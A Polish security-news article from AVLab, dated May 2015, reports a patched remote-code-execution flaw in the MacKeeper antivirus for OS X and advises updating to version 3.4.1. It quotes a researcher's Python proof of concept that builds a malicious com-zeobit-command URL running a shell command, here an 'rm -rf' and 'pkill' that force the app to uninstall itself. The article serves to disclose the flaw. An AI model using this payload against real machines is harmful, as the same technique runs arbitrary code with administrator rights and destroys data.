EN
EN

MacKeeper – antywirus dla OS X z załataną luką 0-day

13 maja, 2015

Jeśli Twój sprzęt od Apple chroni ukraiński antywirus MacKeeper w wersji 3.4.0 lub wcześniejszej, jesteś potencjalną ofiarą ataku nieautoryzowanego wykonania zdalnego kodu z uprawnieniami administratora. Na trop podatności wpadł badacz z firmy SecureMac, który przedstawił proof of concept:

import sys,base64
from Foundation import *
RUN_CMD = "rm -rf /Applications/MacKeeper.app;pkill -9 -a MacKeeper"
d = NSMutableData.data()
a = NSArchiver.alloc().initForWritingWithMutableData_(d)
a.encodeValueOfObjCType_at_("@",NSString.stringWithString_("NSTask"))
a.encodeValueOfObjCType_at_("@",NSDictionary.dictionaryWithObjectsAndKeys_(NSString.stringWithString_("/bin/sh"),"LAUNCH_PATH",NSArray.arrayWithObjects_(NSString.stringWithString_("-c"),NSString.stringWithString_(RUN_CMD),None),"ARGUMENTS",NSString.stringWithString_("Your computer has malware that needs to be removed."),"PROMPT",None))
print "com-zeobit-command:///i/ZBAppController/performActionWithHelperTask:arguments:/"+base64.b64encode(d)

MacKeeper jest tworem ukraińskiej firmy ZeoBIT. Zaprogramowano go w celu zwiększenia wydajności systemu oraz bezpieczeństwa komputerów Mac. Do tej pory udało mu się zyskać całkiem sporą publikę – podana informacja na stronie przez producenta pokazuje wyraźnie, że 20 milionów pobrań nie może być czymś przypadkowym. Niestety w sieci można znaleźć całkiem sporo negatywnych opinii o tym sofcie. Użytkownicy narzekają na wyskakujące okienka reklamowe, które wciskają dodatkowe programy producenta podkreślając konieczność oczyszczenia systemu ze zbędnych śmieci.

O co chodzi?

Luka została odkryta w mechanizmie walidacji adresów URL, które używane są podczas interakcji użytkownika z systemem OS X, iOS a zainstalowanymi programami. Zdefiniowanie własnych URL-i pozwoli przypisać np. kliknięciu myszą w adres e-mail otworzenie aplikacji Mail.app do napisania nowej wiadomości.

Przedstawiony dowód koncepcji umożliwia atakującemu ominięcie tego zabezpieczenia i wykonanie własnego kodu. Oczywiście, aby się to stało ofiara musi najpierw odwiedzić podstawioną stronę internetową, w wyniku czego napastnik może wykonać dowolny kod z uprawnieniami administratora, lub jak w przypadku proof of concept zmusić antywirusa MacKeeper do auto-deinstalacji.  

Zalecamy aktualizację MacKeeper do wersji 3.4.1 lub późniejszej, albo też pozbycie się program na rzecz innego.

Picture of Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.
Picture of Adrian Ścibor

Adrian Ścibor

W ramach działań związanych z cyberbezpieczeństwem odpowiada w AVLab za przeprowadzanie testów rozwiązań ochronnych przed zagrożeniami. Opracowuje strategie oraz narzędzia, które pomagają w ochronie danych i systemów przed cyberatakami. Współuczestnik międzynarodowej grupy non-profit AMTSO, która zrzesza ekspertów IT.

PODZIEL SIĘ:

guest
0 komentarzy
Inline Feedbacks
View all comments
polecane rozwiązania

Polecane rozwiązania

Nie musisz już szukać dobrych ofert! Znaleźliśmy je dla Ciebie!
oferty
specjalne
newsletter poradnik

Zapisz się na newsletter i odbierz unikatowy poradnik

„Jak bezpiecznie funkcjonować w cyfrowym świecie”

tak! Chcę poradnik
ARTYKUŁY

Treść serwisu prawnie chroniona © 2024 | Fundacja AVLab dla Cyberbezpieczeństwa | Polityka prywatności

Wyrażam zgodę na przesłanie oferty drogą telefoniczną przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

Wyrażam zgodę na przesłanie oferty drogą mailową przez IT Partners security sp. z o.o. z siedzibą Katowicach ul.Padereskiego 35 na podany przeze mnie adres e-mail zgodnie z ustawą z dnia 10 maja 2018 roku o ochronie danych osobowych (Dz. Ustaw z 2018, poz. 1000) oraz zgodnie z Rozporządzeniem Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (RODO).

[ninja_tables id=”27481″]

najnowsze artykuły

Ze świata cyber

testy bezpieczeństwa

produkty ochronne

informacje o atakach

wydarzenia online

statystyki i raporty

od redakcji

polecane rozwiązania

wszyscy producenci